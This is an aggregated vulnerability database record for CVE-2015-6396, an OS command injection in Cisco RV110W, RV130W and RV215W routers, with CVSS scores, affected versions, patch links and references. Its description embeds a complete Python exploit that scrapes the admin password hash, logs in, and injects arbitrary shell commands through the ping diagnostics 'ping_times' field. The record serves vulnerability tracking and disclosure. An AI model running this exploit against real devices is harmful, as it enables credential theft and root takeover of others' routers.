ID

VAR-201608-0273


CVE

CVE-2015-6396


TITLE

Vulnerability in the CLI command parser of multiple Cisco device products that allows execution of arbitrary shell commands with administrator privileges

Trust: 0.8

sources: JVNDB: JVNDB-2015-007226

DESCRIPTION

The CLI command parser on Cisco RV110W, RV130W, and RV215W devices allows local users to execute arbitrary shell commands as an administrator via crafted parameters, aka Bug IDs CSCuv90134, CSCux58161, and CSCux73567. A shell command execution vulnerability exists. The Cisco RV110W, RV130W and RV215W are Cisco router products. Multiple Cisco products are prone to a local command-injection vulnerability. A local attacker can exploit this issue to execute arbitrary commands on the host operating system with root privileges. This issue is being tracked by Cisco Bug IDs CSCuv90134, CSCux58161 and CSCux73567. The following products are affected: RV110W Wireless-N VPN Firewall, RV130W Wireless-N Multifunction VPN Router, RV215W Wireless-N VPN Router.

    #!/usr/bin/env python2

    #####
    ## Cisco RV110W Password Disclosure and OS Command Execute.
    ### Tested on version: 1.1.0.9 (maybe useable on 1.2.0.9 and later.)

    # Exploit Title: Cisco RV110W Password Disclosure and OS Command Execute
    # Date: 2018-08
    # Exploit Author: RySh
    # Vendor Homepage: https://www.cisco.com/
    # Version: 1.1.0.9
    # Tested on: RV110W 1.1.0.9
    # CVE : CVE-2014-0683, CVE-2015-6396

    import os
    import sys
    import re
    import urllib
    import urllib2
    import getopt
    import json
    import ssl

    ssl._create_default_https_context = ssl._create_unverified_context

    ###
    # Usage: ./{script_name} 192.168.1.1 443 "reboot"
    ###

    if __name__ == "__main__":
        IP = argv[1]
        PORT = argv[2]
        CMD = argv[3]

        # Get session key, Just access index page.
        url = 'https://' + IP + ':' + PORT + '/'
        req = urllib2.Request(url)
        result = urllib2.urlopen(req)
        res = result.read()

        # parse 'admin_pwd'! -- Get credits
        admin_user = re.search(r'.*(.*admin_name=\")(.*)\"', res).group().split("\"")[1]
        admin_pwd = re.search(r'.*(.*admin_pwd=\")(.{32})', res).group()[-32:]
        print "Get Cred. Username = " + admin_user + ", PassHash = " + admin_pwd

        # Get session_id by POST
        req2 = urllib2.Request(url + "login.cgi")
        req2.add_header('Origin', url)
        req2.add_header('Upgrade-Insecure-Requests', 1)
        req2.add_header('Content-Type', 'application/x-www-form-urlencoded')
        req2.add_header('User-Agent', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)')
        req2.add_header('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8')
        req2.add_header('Referer', url)
        req2.add_header('Accept-Encoding', 'gzip, deflate')
        req2.add_header('Accept-Language', 'en-US,en;q=0.9')
        req2.add_header('Cookie', 'SessionID=')
        data = {"submit_button": "login",
                "submit_type": "",
                "gui_action": "",
                "wait_time": "0",
                "change_action": "",
                "enc": "1",
                "user": admin_user,
                "pwd": admin_pwd,
                "sel_lang": "EN"
                }
        r = urllib2.urlopen(req2, urllib.urlencode(data))
        resp = r.read()
        login_st = re.search(r'.*login_st=\d;', resp).group().split("=")[1]
        session_id = re.search(r'.*session_id.*\";', resp).group().split("\"")[1]

        # Execute your commands via diagnose command parameter, default command is `reboot`
        req3 = urllib2.Request(url + "apply.cgi;session_id=" + session_id)
        req3.add_header('Origin', url)
        req3.add_header('Upgrade-Insecure-Requests', 1)
        req3.add_header('Content-Type', 'application/x-www-form-urlencoded')
        req3.add_header('User-Agent', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)')
        req3.add_header('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8')
        req3.add_header('Referer', url)
        req3.add_header('Accept-Encoding', 'gzip, deflate')
        req3.add_header('Accept-Language', 'en-US,en;q=0.9')
        req3.add_header('Cookie', 'SessionID=')
        data_cmd = {"submit_button": "Diagnostics",
                    "change_action": "gozila_cgi",
                    "submit_type": "start_ping",
                    "gui_action": "",
                    "traceroute_ip": "",
                    "commit": "1",
                    "ping_times": "3 |" + CMD + "|",
                    "ping_size": "64",
                    "wait_time": "4",
                    "ping_ip": "127.0.0.1",
                    "lookup_name": ""
                    }
        r = urllib2.urlopen(req3, urllib.urlencode(data_cmd))

Trust: 2.61

sources: NVD: CVE-2015-6396 // JVNDB: JVNDB-2015-007226 // CNVD: CNVD-2016-06162 // BID: 92269 // VULHUB: VHN-84357 // PACKETSTORM: 150781

IOT TAXONOMY

category: ['Network device'] // sub_category: -

Trust: 0.6

sources: CNVD: CNVD-2016-06162

AFFECTED PRODUCTS

vendor: cisco // model: rv110w wireless-n vpn firewall // scope: - // version: -

Trust: 1.2

vendor: cisco // model: rv130w wireless-n multifunction vpn router // scope: - // version: -

Trust: 1.2

vendor: cisco // model: rv215w wireless-n vpn router // scope: - // version: -

Trust: 1.2

vendor: cisco // model: rv215w wireless-n vpn router // scope: eq // version: *

Trust: 1.0

vendor: cisco // model: rv110w wireless-n vpn firewall // scope: eq // version: *

Trust: 1.0

vendor: cisco // model: rv130w wireless-n multifunction vpn router // scope: eq // version: *

Trust: 1.0

vendor: cisco // model: rv110w wireless-n vpn firewall // scope: eq // version: -

Trust: 0.8

vendor: cisco // model: rv130w wireless-n multifunction vpn router // scope: eq // version: -

Trust: 0.8

vendor: cisco // model: rv215w wireless-n vpn router // scope: eq // version: -

Trust: 0.8

vendor: cisco // model: rv215w wireless-n vpn router // scope: eq // version: 0

Trust: 0.3

vendor: cisco // model: rv130w wireless-n multifunction vpn router // scope: eq // version: 0

Trust: 0.3

vendor: cisco // model: rv110w wireless-n vpn firewall // scope: eq // version: 0

Trust: 0.3

vendor: cisco // model: rv215w wireless-n vpn router // scope: ne // version: 1.3.0.8

Trust: 0.3

vendor: cisco // model: rv130w wireless-n multifunction vpn router // scope: ne // version: 1.0.3.16

Trust: 0.3

vendor: cisco // model: rv110w wireless-n vpn firewall // scope: ne // version: 1.2.1.7

Trust: 0.3

sources: CNVD: CNVD-2016-06162 // BID: 92269 // JVNDB: JVNDB-2015-007226 // CNNVD: CNNVD-201608-173 // NVD: CVE-2015-6396

CVSS

SEVERITY

nvd@nist.gov: CVE-2015-6396
value: HIGH

Trust: 1.0

NVD: CVE-2015-6396
value: HIGH

Trust: 0.8

CNVD: CNVD-2016-06162
value: MEDIUM

Trust: 0.6

CNNVD: CNNVD-201608-173
value: HIGH

Trust: 0.6

VULHUB: VHN-84357
value: HIGH

Trust: 0.1

CVSSV2

nvd@nist.gov: CVE-2015-6396
severity: HIGH
baseScore: 7.2
vectorString: AV:L/AC:L/AU:N/C:C/I:C/A:C
accessVector: LOCAL
accessComplexity: LOW
authentication: NONE
confidentialityImpact: COMPLETE
integrityImpact: COMPLETE
availabilityImpact: COMPLETE
exploitabilityScore: 3.9
impactScore: 10.0
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.8

CNVD: CNVD-2016-06162
severity: MEDIUM
baseScore: 5.0
vectorString: AV:N/AC:L/AU:N/C:N/I:P/A:N
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: NONE
integrityImpact: PARTIAL
availabilityImpact: NONE
exploitabilityScore: 10.0
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.6

VULHUB: VHN-84357
severity: HIGH
baseScore: 7.2
vectorString: AV:L/AC:L/AU:N/C:C/I:C/A:C
accessVector: LOCAL
accessComplexity: LOW
authentication: NONE
confidentialityImpact: COMPLETE
integrityImpact: COMPLETE
availabilityImpact: COMPLETE
exploitabilityScore: 3.9
impactScore: 10.0
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.1

CVSSV3

nvd@nist.gov: CVE-2015-6396
baseSeverity: HIGH
baseScore: 7.8
vectorString: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
attackVector: LOCAL
attackComplexity: LOW
privilegesRequired: LOW
userInteraction: NONE
scope: UNCHANGED
confidentialityImpact: HIGH
integrityImpact: HIGH
availabilityImpact: HIGH
exploitabilityScore: 1.8
impactScore: 5.9
version: 3.0

Trust: 1.8

sources: CNVD: CNVD-2016-06162 // VULHUB: VHN-84357 // JVNDB: JVNDB-2015-007226 // CNNVD: CNNVD-201608-173 // NVD: CVE-2015-6396

PROBLEMTYPE DATA

problemtype:CWE-78

Trust: 1.9

sources: VULHUB: VHN-84357 // JVNDB: JVNDB-2015-007226 // NVD: CVE-2015-6396

THREAT TYPE

local

Trust: 0.9

sources: BID: 92269 // CNNVD: CNNVD-201608-173

TYPE

operating system command injection

Trust: 0.6

sources: CNNVD: CNNVD-201608-173

CONFIGURATIONS

sources: JVNDB: JVNDB-2015-007226

PATCH

title: cisco-sa-20160803-rv110_130w1 // url: http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160803-rv110_130w1

Trust: 0.8

title: Patches for any command execution vulnerability in multiple Cisco products // url: https://www.cnvd.org.cn/patchInfo/show/80243

Trust: 0.6

title: Cisco RV110W, RV130W and RV215W Repair measures for device security vulnerabilities // url: http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=63566

Trust: 0.6

sources: CNVD: CNVD-2016-06162 // JVNDB: JVNDB-2015-007226 // CNNVD: CNNVD-201608-173

EXTERNAL IDS

db: NVD // id: CVE-2015-6396

Trust: 3.5

db: BID // id: 92269

Trust: 2.0

db: EXPLOIT-DB // id: 45986

Trust: 1.1

db: SECTRACK // id: 1036528

Trust: 1.1

db: JVNDB // id: JVNDB-2015-007226

Trust: 0.8

db: CNNVD // id: CNNVD-201608-173

Trust: 0.7

db: AUSCERT // id: ESB-2016.1890

Trust: 0.6

db: CNVD // id: CNVD-2016-06162

Trust: 0.6

db: VULHUB // id: VHN-84357

Trust: 0.1

db: PACKETSTORM // id: 150781

Trust: 0.1

sources: CNVD: CNVD-2016-06162 // VULHUB: VHN-84357 // BID: 92269 // JVNDB: JVNDB-2015-007226 // PACKETSTORM: 150781 // CNNVD: CNNVD-201608-173 // NVD: CVE-2015-6396

REFERENCES

url:http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20160803-rv110_130w1

Trust: 2.0

url:http://www.securityfocus.com/bid/92269

Trust: 1.1

url:https://www.exploit-db.com/exploits/45986/

Trust: 1.1

url:http://www.securitytracker.com/id/1036528

Trust: 1.1

url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-6396

Trust: 0.8

url:http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2015-6396

Trust: 0.8

url:https://www.auscert.org.au/render.html?it=37422

Trust: 0.6

url:http://www.cisco.com/

Trust: 0.4

url:https://nvd.nist.gov/vuln/detail/cve-2014-0683

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2015-6396

Trust: 0.1

sources: CNVD: CNVD-2016-06162 // VULHUB: VHN-84357 // BID: 92269 // JVNDB: JVNDB-2015-007226 // PACKETSTORM: 150781 // CNNVD: CNNVD-201608-173 // NVD: CVE-2015-6396

CREDITS

Adam Zielinski.

Trust: 0.3

sources: BID: 92269

SOURCES

db: CNVD // id: CNVD-2016-06162
db: VULHUB // id: VHN-84357
db: BID // id: 92269
db: JVNDB // id: JVNDB-2015-007226
db: PACKETSTORM // id: 150781
db: CNNVD // id: CNNVD-201608-173
db: NVD // id: CVE-2015-6396

LAST UPDATE DATE

2024-11-23T21:55:27.059000+00:00


SOURCES UPDATE DATE

db: CNVD // id: CNVD-2016-06162 // date: 2016-08-09T00:00:00
db: VULHUB // id: VHN-84357 // date: 2018-12-15T00:00:00
db: BID // id: 92269 // date: 2016-08-03T00:00:00
db: JVNDB // id: JVNDB-2015-007226 // date: 2016-08-17T00:00:00
db: CNNVD // id: CNNVD-201608-173 // date: 2016-08-08T00:00:00
db: NVD // id: CVE-2015-6396 // date: 2024-11-21T02:34:55.313

SOURCES RELEASE DATE

db: CNVD // id: CNVD-2016-06162 // date: 2016-08-09T00:00:00
db: VULHUB // id: VHN-84357 // date: 2016-08-08T00:00:00
db: BID // id: 92269 // date: 2016-08-03T00:00:00
db: JVNDB // id: JVNDB-2015-007226 // date: 2016-08-17T00:00:00
db: PACKETSTORM // id: 150781 // date: 2018-12-14T18:00:57
db: CNNVD // id: CNNVD-201608-173 // date: 2016-08-08T00:00:00
db: NVD // id: CVE-2015-6396 // date: 2016-08-08T00:59:00.140